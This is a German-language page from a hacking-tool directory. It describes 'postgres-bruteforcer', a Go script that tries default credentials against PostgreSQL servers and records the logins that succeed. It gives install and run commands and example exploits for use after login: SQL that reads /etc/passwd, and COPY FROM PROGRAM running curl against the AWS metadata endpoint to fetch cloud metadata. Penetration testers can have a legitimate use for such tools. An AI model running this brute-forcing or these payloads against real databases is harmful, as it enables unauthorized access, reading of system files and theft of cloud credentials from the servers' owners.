Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/randomrobbiebf/postgres-bruteforcer
PasswortangriffeExploitationPenetrationstestsAuthentifizierungDatenbanksicherheit
GitHubrandomrobbiebf/postgres-bruteforcer

postgres-bruteforcer

Dieses Tool nimmt eine Liste von Standard-Zugangsdaten, testet sie gegen einen PostgreSQL-Server und protokolliert alle, die funktionieren, sowie die Datenbanken, auf die es Zugriff hat.

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
2vor 3 JahrenNoch nicht geprüft

postgres-bruteforcer

Über

Dieses Go-Skript liest eine Liste von Benutzernamen und Passwörtern aus einer Datei namens creds.txt und testet sie gegen eine PostgreSQL-Datenbank.

Das Skript akzeptiert die IP des PostgreSQL-Servers als Befehlszeilenargument oder eine Textdatei mit IPs.

Wenn ein Zugriff gewährt wird, schreibt das Skript diese Ausgabe in eine Datei namens pg-output.txt.

Wenn der Benutzer postgres verfügbar ist, ist dies normalerweise ein Superuser, der RCE oder LFI oder SSRf ermöglichen kann.

Installation

root@kitploit:~
go install -v github.com/RandomRobbieBF/postgres-bruteforcer@latest

Ausführung

root@kitploit:~
go run postgres-brute.go 1.1.1.1

postgres

Beispiel-Exploits

/etc/passwd/ abrufen

root@kitploit:~
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile;

SSRF - AWS-Metadaten abrufen

root@kitploit:~
CREATE TABLE weather_json (cities TEXT);
COPY weather_json FROM PROGRAM 'curl -L http://169.254.169.254/latest/meta-data/';
SELECT weather_json FROM weather_json;
Tool herunterladen